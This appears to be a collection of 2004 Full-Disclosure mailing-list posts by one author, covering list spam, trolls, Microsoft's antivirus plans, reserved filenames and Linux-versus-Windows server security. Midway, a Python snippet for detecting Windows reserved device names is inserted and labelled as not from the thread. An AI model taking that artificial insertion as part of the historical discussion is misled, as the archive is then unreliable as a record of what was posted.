them a day.  If I see one that gets through, I know something's wrong.

One problem with doing any kind of filtering is that, as a common carrier
(i.e., the list owners just running a distribution system), you could
become legally liable for the content because now you are inspecting
it and deciding on whether or not to let it through.  We host a lot of
websites, we do not accept any responsibility for nor filter content.
If there is a problem, we deal with it.  If we did filter or censor, we
could become legally liable for content.  We pay quite a bit of money to a
well known company to provide virus scanning for our customers.  A major
reason that we pay is that as long as we make sure our system works,
they would likely be liable for mistakes.  I'm sure that our mail system
transfers at least 100,000 "viruses" a day, probably a lot more, but we
are just a common carrier, unless you've signed up for virus scanning.

Gadi made a good point about spam (or the lack of it) on this list and
if there was some kind of filtering going on.  I have a good spam filter
and am good at picking out and deleting spam before looking at it, so I
don't know if the list gets spam or not.  I suspect that spammers don't
want to send to lists like this, as they would have to fake an address
from someone on the list (it is closed) and they would draw excessive
attention to themselves from a community that knows what they are doing.
If I were a spammer, I would definitely try to avoid lists like this.


Todd Burroughs
---
The Internet has given us unprecedented opportunity to communicate and
share on a global scale without borders; fight to keep it that way.



Re: [Full-Disclosure] Re: Full-Disclosure digest, Vol 1 #1694 - 33 msgs

2004-06-09 Thread Todd Burroughs
It *could* have been funny, but it seems that there are enough people
on the list stupid enough to fall for these obvious trolls.  If you
must respond to them, do it off list.

If you think someone may be clueless, clue them in *off the list*.
Also, read the whole thing, "Expert sysadmin since 2003" should
clue you in that it's either a joke or the guy's an idiot.  (I suspect
that he's laughing at the responses...)

I'm all for helping newbies and a good joke...  I remember a sign in
my small engines class back in high school, it applies to everything:
"CAUTION: Start brain before engaging tongue"  (In this case, fingers ;-)

Todd Burroughs
---
The Internet has given us unprecedented opportunity to communicate and
share on a global scale without borders; fight to keep it that way.

On Wed, 9 Jun 2004 [EMAIL PROTECTED] wrote:

> First the guy asking for the C# security scanner, and now him ...
>
> What a waste of our time and resources.
>
> 
>
> > Message: 29
> > From: "Billy B. Bilano" <[EMAIL PROTECTED]>
> > To: <[EMAIL PROTECTED]>
> > Subject: Re: [Full-Disclosure] Possible First Crypto Virus Definitely Discovered!
> > Date: Tue, 8 Jun 2004 14:00:03 -0500
> >
> > Oliver! Hello!
> >
> > SSL is the same port as HTTPS ? OMFG then we have a bigger problem than I
> > ever imagined!! HOLY SMOKES! I am going to block port 443 right now and I
> > urge ALL of you to do the same before this gets out of control!
> >
> > Also, Oliver, I am sure I am telling you something you don't know, but you
> > have a bunch of crypto code that is more then likely a virus at the end of
> > your message! In fact, you are so infected, that it seems the crypto code is
> > longer then the entire message you sent! This is probably how it spreads! I
> > saw a couple of other people on this thing already that had this same
> > symptom.
> >
>
>
>
>
>



Re: [Full-Disclosure] MS Anti Virus?

2004-06-17 Thread Todd Burroughs
They are planning to get into a market that guards against the failures
in their own product.  I don't like this, as it seems that they are going
to be in a position to intentionally make holes that their "anti-virus"
software will fix.  If we had a more competitive market in this type of
software there would be no market for AV software and the AV companies
would be making better operating systems.  Remember, Microsoft is a
marketing company and they are very good at it and very powerful.

Educate your friends and family.  Unfortunately, there isn't much choice
right now, but someone will do for Linux (or *BSD) what Apple has done.
If Apple was smart, they would make an OS for PCs.  Maybe they will...

It's sad that we are wasting so many resources on what should be a
non-problem.

Todd Burroughs
---
The Internet has given us unprecedented opportunity to communicate and
share on a global scale without borders; fight to keep it that way.

On Wed, 16 Jun 2004, Chris Cappuccio wrote:

> I hate to say this, but I don't think Microsoft software could be any
> worse than Symantec...
>
> Andre Ludwig [EMAIL PROTECTED] wrote:
> > Think the mafia refers to this as a protection racket...
> >
> > man so much can be made of this its a techy comedy gold mine.
> >
> >
> > "our software sucks so bad that the market for anti virus software for
> > our platform is such a lucrative market that we cant stay out of it"
> >
> > Andre Ludwig CISSP
> >
> > On Wed, 16 Jun 2004 19:41:49 -0400, slacker <[EMAIL PROTECTED]> wrote:
> > >
> > > 
> > > >  SEATTLE (Reuters) - Microsoft Corp. (MSFT.O: Quote, Profile,
> > > > Research) is still on track to offer an anti-virus product that will
> > > > compete against similar software offered by Symantec Corp. (SYMC.O:
> > > > Quote, Profile, Research) and Network Associates Inc. (NET.N: Quote,
> > > > Profile, Research) , the world's largest software maker said late on
> > >
> > > Oh yeah, what's the average delay to release on exploit patches? What makes
> > > me think that they are going to be that slow on releasing AV updates?  =P
> > >
> > > slacker
> > >
> > >
> >
>
> --
> "When it absolutely, positively had to be there yesterday: Temporal Express"
>
>



Re: [Full-Disclosure] M$ - so what should they do?

2004-06-22 Thread Todd Burroughs
On Mon, 21 Jun 2004 [EMAIL PROTECTED] wrote:

> > No way!  Am I the only person who still uses "copy con filename.txt" to
> > create scripts and such at the command line?  Please tell me I'm not?
>
> I think the intent is that "con as a special filename in every directory" has
> to go away - you'd still be able to use
>
> copy c:\something\con filename.txt
>
> (Remember, us Unix people have had to use /dev/tty and /dev/null and /dev/zero
> for 3 decades, and never minded that 'tty', 'null', and 'zero' didn't exist in
> every single directory)

Does this really matter?  On UNIX I can use /dev/whatever in any
directory and I have to have that access to make UNIX work.  Not having
/dev/null available in every directory breaks things, I rely on it
being there...  The OS controls my access, I assume Windows does the
same thing.

Maybe having "magic" names that don't start with '/dev' (i.e., some known
prefix) is a mistake, but I think that's a minor issue.

Personally, I think the design of the registry and having apps like a GUI
and web browser intricately tied into the OS is a very bad design and is
at the core of the problem.  Another is that MS is a marketing company,
so they do things to gain and keep market share.  That's been discussed
to no end ;-)

Microsoft would come a long way, very easily, in security if they made it
so that you usually run things as a user, not "root" or "Administrator".
Lindows has this wrong and if it gets popular, it will have similar
problems.  Unfortunately for MS, if they make things harder, Linux starts
to look easier...

Todd

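The reserved-name behaviour discussed in this thread (CON and friends being special in every Windows directory, versus Unix devices that are only special by their path under /dev) as an added Python example; this is not code from the thread, and the underscore-prefix rename policy in safe_upload_name and the cwd default are assumptions made here:

```python
"""Added example: detect Windows reserved device names in untrusted filenames
and contrast with Unix, where only the location under /dev makes a device."""
import posixpath
import re
from typing import Optional

# Names Windows treats as devices in *every* directory, regardless of
# extension (CON.txt is still the console) or trailing dots and spaces.
_WINDOWS_DEVICE_NAMES = frozenset(
    ["CON", "PRN", "AUX", "NUL"]
    + [f"COM{n}" for n in range(1, 10)]
    + [f"LPT{n}" for n in range(1, 10)]
)


def windows_device_name(filename: str) -> Optional[str]:
    """Return the reserved device name the last path component resolves to,
    or None if it is an ordinary name."""
    # Only the last component matters: c:\something\con is still CON.
    component = re.split(r"[\\/]", filename)[-1]
    # Windows strips trailing dots and spaces, so "con ." is still CON.
    component = component.rstrip(" .")
    # The name part is everything before the first '.' or ':' (extension or
    # NTFS stream suffix), so "CON.txt" and "nul:stream" are both devices.
    name = re.split(r"[.:]", component, maxsplit=1)[0].rstrip(" ").upper()
    return name if name in _WINDOWS_DEVICE_NAMES else None


def unix_is_device_path(path: str, cwd: str = "/home/user") -> bool:
    """On Unix a file is a device only by its absolute location under /dev;
    a file literally named 'null' in the working directory is a plain file.
    The cwd default is an assumption for this example."""
    absolute = posixpath.normpath(posixpath.join(cwd, path))
    return absolute == "/dev" or absolute.startswith("/dev/")


def safe_upload_name(filename: str) -> str:
    """Rename an untrusted filename that collides with a Windows device name
    so it can be stored on any filesystem. Assumed policy: underscore prefix."""
    component = re.split(r"[\\/]", filename)[-1]
    if windows_device_name(component) is not None:
        return "_" + component
    return component


if __name__ == "__main__":
    for candidate in ("con", "CON.txt", "nul:stream", "console.txt", "com10"):
        print(f"{candidate!r:16} -> {windows_device_name(candidate)}")
    print("/dev/null is a device path:", unix_is_device_path("/dev/null"))
    print("./null is a device path:", unix_is_device_path("null"))
```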


RE: [Full-Disclosure] M$ Getting Better?

2004-06-22 Thread Todd Burroughs
> I for one, DO have experience in both Windows and Unix system administration, and
> every one of our internet facing machines is running Linux.  Why?  Because for me
> they are easier to secure.  I can turn off any services that I don't need, I have a
> fully-functional firewall on every box, and I don't have to reboot once a month to
> stay secure (all updates are currently automated, only kernel vulns need a reboot).

From my experience, we reboot our Windows servers daily or more often
just to keep them running.  (They are very busy) It's a given that we
have to reboot when doing updates.  We don't usually have to reboot to
do updates with Linux or *BSD, unless we replace the kernel or libc,
which is much more rare.  (ok, Linux kernel has been bad lately ;-)

Basically, we run a bunch of load balanced Linux boxes and they don't
get rebooted much, except that we've designed and implemented a system to
install them automatically, so we reboot them for security updates because
it's easier (re-installs everything that is different), but then they
basically reinstall themselves.  It's simple, we don't have the unique
binary registry to deal with, just the config files that are common to
all similar servers.  This is not possible with Windows as far as I know.
(I know there's some third party stuff that might make it work, but it's
$$$ and probably second rate software)

On our Windows side, we have two servers to handle each group of users
(websites).  Our load balancers failover to one or the other.  Each of
these handles a max of 1000 domains.  The Linux servers have over 100,000
domains each and balance among a lot of servers.  This is not possible
with Windows (maybe by paying a *lot* of money it is, I don't know)

We have not figured out how to make a Windows box install and come up
serving web/mail with no human intervention, but we do that with all of
our Linux boxes.  When we lose a hard drive on a blade server, we replace
it and turn it on, it installs and comes up doing mail/web or whatever.

We also do not have any Windows boxes directly facing the Internet,
it's too dangerous.  They're all hidden behind firewalls, etc.   We have
hundreds of Linux and FreeBSD boxes directly on the 'net though.  It's a
pain to keep them safe, but it's not hard compared to Windows.

Sorry, but the MS system is not secure and not easy to secure or
administer on a large scale.  I prefer Linux and don't particularly like
MS, but I use whatever makes sense.  I'm not a "fanboy" for anything.

Todd



RE: [Full-Disclosure] IE Web Browser: "Sitting Duck"

2004-07-08 Thread Todd Burroughs
My thinking and experience shows that in the real world, Linux, OSX,
etc. is more secure.  Some of that is by obscurity, which isn't real
security, but does work in the real world.  Most of it is due to peer
review.  Having said that, when you cannot look at the source code,
it is really obscure.

When a problem is found in Open/Free software, many people look into it
and often when the exploit is announced, a patch is included (which may
or may not fix the problem).  Because it is openly displayed with source
code, many people look at it and it seems to get fixed quite quickly.
"Closed source" companies, for the most part seem to take a lot longer
in fixing things (some exceptions) and they do not have the same number
of people looking over the code.

One major thing with UNIX-like systems is that things are not so closely
tied together as in Windows.  Sure, you have the kernel and libc that
are really tied, but you don't have 100 of them that will break multiple
things when you update one.  I think this is one of the major problems
with Windows, it has way too many dependencies.  A simple browser update
is like updating libc in UNIX (which is nasty).  I can't even imagine
trying to write a patch for a system like that.

I really hope that MS fixes their security issues or something else
that is more easily maintained takes over.

Todd
